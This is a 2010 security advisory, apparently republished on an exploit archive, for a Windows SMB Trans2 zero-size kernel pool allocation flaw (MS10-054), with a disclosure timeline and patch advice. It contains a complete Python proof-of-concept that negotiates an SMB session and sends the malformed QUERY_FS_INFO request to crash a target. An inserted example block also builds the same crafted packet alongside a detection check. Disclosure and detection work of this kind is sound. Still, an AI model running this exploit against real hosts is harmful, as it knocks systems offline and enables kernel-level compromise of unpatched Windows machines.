Microsoft SMB Server Zero Size Pool Allocation
Posted Aug 13, 2010
Authored by laurent gaffie | Site stratsec.net

A vulnerability in the Windows kernel can be triggered via SMB in Microsoft Windows versions ranging from Windows 2000 through to Windows 7. This vulnerability allows an attacker to trigger a kernel pool corruption by sending a specially crafted SMB_COM_TRANSACTION2 request. Successful exploitation of this issue may result in remote code execution with kernel privileges, while failed attempts will result in a denial of service condition.

tags | exploit, remote, denial of service, kernel, code execution
systems | windows, 2k, 7
MD5 | 7da37b9742180e99589a08d84a405ff9

===============================================================================
stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation
===============================================================================

Title: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation
Version: 1.0
Issue type: Pool Corruption
Affected vendor: Microsoft
Release date: 11/08/2010
Discovered by: Laurent Gaffié
Advisory by: Laurent Gaffié
Issue status: Patch available

===============================================================================

Summary
-------

A vulnerability in the Windows kernel can be triggered via SMB in Microsoft
Windows versions ranging from Windows 2000 through to Windows 7. This
vulnerability allows an attacker to trigger a kernel pool corruption by sending
a specially crafted SMB_COM_TRANSACTION2 request. Successful exploitation of
this issue may result in remote code execution with kernel privileges, while
failed attempts will result in a denial of service condition. Microsoft has
published a patch to resolve the issue.


Technical details
-----------------

The following analysis has been performed on an up-to-date Windows 7 x86-32
system. The issue is triggered by sending a crafted SMB_COM_TRANSACTION2
request:
- The client connects to an SMB server on which it has at least read privileges
on a share.
- The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute
info" request with the Max DataCount parameter set to 0.

During processing of the query, SrvSmbQueryFsInformation() from srv.sys calls
NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe.
NtQueryVolumeInformationFile then allocates a pool chunk whose size is taken
from unverified user input:

kd> nt!NtQueryVolumeInformationFile+0x3de:
82a5779c ff7514 push dword ptr [ebp+14h] ;User controlled
82a5779f 50 push eax
82a577a0 e85d1fe6ff call nt!ExAllocatePoolWithQuotaTag (828b9702)
82a577a5 eb23 jmp nt!NtQueryVolumeInformationFile+0x40c (82a577ca)
kd>

The actual code of the NtQueryVolumeInformationFile function looks like this:

NTSTATUS
NtQueryVolumeInformationFile(IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileSystemInformation,
IN ULONG Length,
IN FS_INFORMATION_CLASS FileSystemInformationClass)
{

if (RequestorMode != KernelMode)
{
}

if (FileSystemInformationClass == FileFsDeviceInformation)
{
}

if (FileSystemInformationClass == FileFsDriverPathInformation)
{
PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source;
Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation;
Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length);

RtlCopyMemory(Buffer, Source, Length);

NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length);

// [...]
if (Buffer) ExFreePool(Buffer);
}


// Issue:
// SystemBuffer, which is the buffer used for the I/O, can be allocated with
// a size of zero because of the lack of a length sanity check.
// Later this buffer is used for various operations, which is the source of
// trouble when the I/O Manager tries to release the buffer.

Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool,
                                                          Length);
// This buffer is freed later by the Windows I/O Manager.
}
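As an added example (not part of the advisory or of stratsec's code), the following Python 3 snippet lays out the Trans2 QUERY_FS_INFORMATION request described above and parses it back, so that the MaxDataCount == 0 condition can be checked on captured SMB1 traffic; the field layout follows MS-CIFS, and the constant and function names, the header flags and the zeroed TID/PID/UID/MID are my own assumptions.

```python
import struct

# SMB1 constants per MS-CIFS (assumed here; the advisory names only the subcommand)
SMB_COM_TRANSACTION2 = 0x32
TRANS2_QUERY_FS_INFORMATION = 0x0003
SMB_QUERY_FS_ATTRIBUTE_INFO = 0x0105
SMB_HEADER_FMT = "<4sBIBHH8sHHHHH"       # 32-byte SMB header
TRANS2_WORDS_FMT = "<HHHHBBHIHHHHHBBH"    # the 15 request words (one setup word)


def build_trans2_query_fs(max_data_count, info_level=SMB_QUERY_FS_ATTRIBUTE_INFO):
    """Constructed SMB1 Trans2 QUERY_FS_INFORMATION request with NetBIOS framing.
    TID/PID/UID/MID are zero because no live session exists; used as sample input."""
    header = struct.pack(SMB_HEADER_FMT, b"\xffSMB", SMB_COM_TRANSACTION2,
                         0, 0x18, 0xC801, 0, b"\0" * 8, 0, 0, 0, 0, 0)
    params = struct.pack("<H", info_level)           # Trans2 parameters: information level
    pad = b"\0" * 3                                  # align parameters to offset 68
    param_off = len(header) + 1 + 30 + 2 + len(pad)  # header + WordCount + words + ByteCount + pad
    words = struct.pack(TRANS2_WORDS_FMT,
                        len(params), 0, 0, max_data_count,   # TotalParam, TotalData, MaxParam, MaxData
                        0, 0, 0, 0, 0,                       # MaxSetupCount, Reserved, Flags, Timeout, Reserved2
                        len(params), param_off,              # ParameterCount, ParameterOffset
                        0, param_off + len(params),          # DataCount, DataOffset
                        1, 0, TRANS2_QUERY_FS_INFORMATION)   # SetupCount, Reserved3, Setup[0]
    smb = header + bytes([15]) + words + struct.pack("<H", len(pad) + len(params)) + pad + params
    return struct.pack(">I", len(smb)) + smb         # NetBIOS session message (type 0 + 3-byte length)


def parse_trans2_request(pkt):
    """Pull the fields relevant to this bug out of a NetBIOS-framed SMB1 packet;
    return None if it is not a well-formed SMB_COM_TRANSACTION2 request."""
    if len(pkt) < 4:
        return None
    smb = pkt[4:4 + (struct.unpack(">I", pkt[:4])[0] & 0x00FFFFFF)]
    if len(smb) < 63 or smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_TRANSACTION2 or smb[32] < 15:
        return None
    w = struct.unpack_from(TRANS2_WORDS_FMT, smb, 33)
    param_count, param_off, subcommand = w[9], w[10], w[15]
    info_level = None
    if param_count >= 2 and param_off + 2 <= len(smb):
        info_level = struct.unpack_from("<H", smb, param_off)[0]
    return {"max_data_count": w[3], "subcommand": subcommand, "info_level": info_level}


def is_zero_maxdata_query_fs(pkt):
    """Detection check: Trans2 QUERY_FS_INFORMATION with MaxDataCount == 0, the shape
    of the crafted request described in the advisory."""
    f = parse_trans2_request(pkt)
    return (f is not None and f["subcommand"] == TRANS2_QUERY_FS_INFORMATION
            and f["max_data_count"] == 0)
```

A legitimate client asks for a non-zero MaxDataCount, so the check is a narrow signature rather than a general anomaly detector; the patch from MS10-054 remains the fix.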



Impact
------

Successful attempts may allow code execution with kernel privileges; failed
attempts will result in a denial of service (BSOD).

Affected products
-----------------

Windows:
- 2000
- XP
- 2003
- Vista
- 2008
- 7
- 2008R2



Proof of concept
----------------

#!/usr/bin/env python
import sys,struct,socket
from socket import *

if len(sys.argv)<=2:
    print '#######################################################################'
    print '# MS10-054 Proof Of Concept'
    print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
    print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'
    print '#######################################################################\n\n'
    sys.exit()

host = str(sys.argv[1]),445

packetnego = "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"

def tidpiduidfield(data):
    all_=data[28:34]
    return all_

def handle(data):
    ##Chained SMB commands; Session Setup AndX Request,Tree connect
    if data[8:10] == "\x72\x00":
        sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
        packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
        packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
        packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
        packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
        packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
        packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
        packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
        packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
        packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
        print "[+]Session Query sent"
        return struct.pack(">i", len(packetsession))+packetsession

    ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
    if data[8:10] == "\x73\x00":
        packetrans = "\x00\x00\x00\x46"
        packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
        packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
        packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
        packetrans += "\x00\x00\x44\x20\x05\x01"
        print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
        return packetrans

def run():
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host)
    s.settimeout(2)
    s.send(packetnego)
    print "[+]Negotiate Protocol Request sent"
    try:
        while True:
            data = s.recv(1024)
            s.send(handle(data))
    except Exception:
        pass
    s.close()
run()

Solution
--------

Apply appropriate security patches published by Microsoft in advisory MS10-054.
Alternatively, configure a firewall to block SMB communications with untrusted
clients.

Response timeline
-----------------

* 11/02/2010 - Vendor notified.
* 11/02/2010 - Vendor acknowledges the advisory.
* 16/02/2010 - MSRC confirms the issue on Windows 7.
* 26/02/2010 - MSRC provides a DC number and confirms the vulnerability across
Windows 2000 to Windows 7.
* 27/02/2010 - MSRC indicates the vulnerability is to be categorised as post-auth
on all platforms and asks for confirmation. stratsec responds
with additional information.
* 11/03/2010 - MSRC confirms the issue as a remote unauthenticated code execution
issue for pre-Windows Vista platforms and upgrades the overall
bulletin severity to Critical.
* 12/03/2010 - MSRC plans to release a patch in June 2010.
* 30/04/2010 - MSRC pushes back the update to August 2010. stratsec agrees on the
new release date.
* 24/07/2010 - MSRC confirms the patch for August.
* 05/08/2010 - MSRC proposes to give a vendor statement or review this advisory.
* 05/08/2010 - stratsec requests the CVE number and advisory link from MSRC, and
provides this advisory for review.
* 09/08/2010 - MSRC confirms the technical details of this advisory, and provides
the CVE and link details.
* 11/08/2010 - This advisory released.


References
----------

* Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx
* CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550


===============================================================================

About stratsec
--------------
Stratsec specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia.

For more information, please visit our website at http://www.stratsec.net/

===============================================================================